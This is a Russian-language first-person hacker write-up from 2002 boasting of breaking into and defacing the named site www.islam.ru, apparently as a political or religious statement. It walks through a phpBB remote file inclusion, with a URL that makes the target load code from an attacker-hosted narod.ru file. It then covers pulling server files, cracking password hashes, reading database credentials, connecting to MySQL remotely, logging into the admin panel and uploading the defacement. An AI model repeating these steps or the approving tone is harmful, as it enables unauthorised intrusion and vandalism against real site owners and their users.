• Партнер

  • [НАЧАЛО]

    26 октября 2002. Вечер. 

    Пройдясь по известным мне
    сайтам, я остановился
    на сайте www.islam.ru.
    Наверно я его выбрал потому, что в домене ru,
    и его еще никто не ломал :). Полазил,
    посмотрел что к чему, и сделал вывод - весь
    сайт работает на PHP, пока будем работать с Web-интерфейсом,
    демоны позже. С грустью посмотрел на XSpider'а -
    не запустил.

    Далее составил примерный список всех
    скриптов (по названиям), и начал искать их в
    Инете. Поисковики столько инфы выплеснули,
    причем весьма отдаленной от тематики -
    разгребать этот мусор не было времени - надо
    делать взлом пока он актуален.

    Зашел в форум - обычный, типа UBB, прокручиваю
    пейдж - вижу надпись PhpBB 2.0.0. Дас - ну что
    проверим?

    [BUG] 

    Explorer: В http://www.securityfocus.com
    пишем PhpBB 2.0.0.

    Одна ссылка,
    заходим. Говорили мне учить английский, но
    кое-как я понял, что есть в этом форуме
    скрипт install.php, который подгружает и
    исполняет файл functions_selects.php из указанной
    директории.

    Explorer: http://www.islam.ru/phorum/install.php?phpbb_root_dir=/ 

    Он мне отвечает "Cannot find /wwwroot/islam/phorum/includes/functions_selects.php".
    Ага! Вот оно как работает, далее почитав
    БагТрак понял, что можно подгружать с
    других серверов:

    http://www.islam.ru/phorum/install.php?phpbb_root_dir=http://www.MYSITE.ru/

    Заходим на Narod.ru, быстренько регистрируем
    сайт http://install2.narod.ru
    (кстати, там и миррор дефейса). Создаем на
    народе файл functions_selects.php. 

    <? Print ("hello\n"); ?> 

    Explorer: http://www.islam.ru/phorum/install.php?m=http://install2.narod.ru/ 

    Ответ: "Cannot find http://install2.narod.ru/includes/functions_selects.php". 
    Ааа. Понял - бегом на Народ. Создаем
    директорию includes, туда пихаем файл.

    Опять пробуем. Ответ: "hello". Уже хорошо.
    Теперь надо проверить, что мы можем. Не буду
    приводить исходники скрипта, просто опишу
    действия. 

    <? 
    //просмотр директории 
    //просмотр файла 
    //запись файла 
    //исполнение команды 
    ?> 

    Ошибка. Недостаточно прав на запись и
    исполнение, а просматривать файлы,
    директории могу. Значит дефейс будет
    сделать труднее. Потихоньку начинаю
    скачивать все файлы с сервера. Одновременно
    с этим нашел файлы типа htpasswd. John The Ripper начал
    работу. Лег спать. 

    [День ¦2.] 

    Проснувшись и покушав, включил телевизор,
    положение не улучшилось. "Помочь" на
    Дубровке я не мог, а вот тут у меня шансы
    были-. 

    JTR дал 0%. Начал изучать исходники и иерархию
    директорий. Сразу кинулась в глаза
    директория admin. Зашел на www.islam.ru/admin - что-то
    типа "Удаленное управление 3.1.9". А где
    пароль храниться? Открыл /admin/index.php - пароль
    сравнивается с строкой из базы данных (mysql),
    скрипт оперирует какими-то переменными $DB,
    $DB_SERVER, $DB_LOGIN,$DB_PASSWORD. Посмотрел в начале, а
    там загружаемый модуль. Открываю этот
    модуль. Есть Логин, Пароль, База Данных, MySQL
    сервер.

    Мое предположение: работа с MySQL возможна
    только с правами Web-сервера (я бы так сделал).
    Значит будем через Баг впихивать скрипт для
    работы с MySQL, и выводить на экран все, что
    вязано с WHEREIS id=0.Сколько я мучился отлаживая
    этот скрипт не передать словами, но никак не
    хотел он присоединяться к серваку, то одна,
    то другая ошибка. Решил оставить муторное
    дело.

    Вариант второй. Понадеялся на недочет в
    системе безопасности (с любого ip можно
    подключаться к MySQL серверу). Странно, очень
    долго искал клиент, а потом просто набрал в
    броузере www.mysql.ru
    и опа, такой классный и под винды. Запустил,
    ввел данные, 10 секунд ожидания и таблицы,
    таблицы и данные, данные :).

    В /admin/index.php смотрю из какой таблицы берутся
    пароли, открываю ее и пароль есть, логин
    есть. 

    Explorer: www.islam.ru/admin - ввожу логин/пароль.
    Передо мной очень много всего, похоже на
    автоматическое добавление новостей, но с
    расширенными функциями, работает со всеми
    страницами сайта. Кликаю на Главную.

    Несколько полей ввода: Титл страницы, файл
    шапки, Тело, файл ботинок 🙂 ну и т.д. Тело
    редактировать - проблем нет, но вот с
    файлами шапки и ботинок проблемы были. Если
    не правильный файл ввести, вылетала ошибка.
    Ну какой дефейс с ошибкой и без тегов :).
    Значит единственный результат, задать в
    этих полях или пустые файлы, или файлы
    которые ничего не отображают. Скоро был
    найден такой файл, там были счетчики, против
    них ничего плохого не имею. Залил дефейс.

    [Послесловие] 

    На следующий день получил 20 писем,
    содержанием от "%#$!$% на ;%¦" до "МОЛОДЦЫ
    РЕБЯТА! ТАК ДЕРЖАТЬ!". Так же было письмо
    от админа. Предлагал телефон оставить -
    наивный. Кстати, админ долго не мог понять,
    что у меня пассворд есть, он убил форум. Но я
    ему сказал, все исправил, и вроде все там ОК.

    Результат. Я удовлетворен, конечно это мало
    кому тогда было интересно, но для меня это
    было важно. Я высказал свое мнение и позицию
    по данной проблеме.

    P.S. Чуть не забыл, огромный привет LJ и
    компании c канала #xakep (irc.dal.net.ru).

    WingGod
    Rootteam http://www.sysworld.net

    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии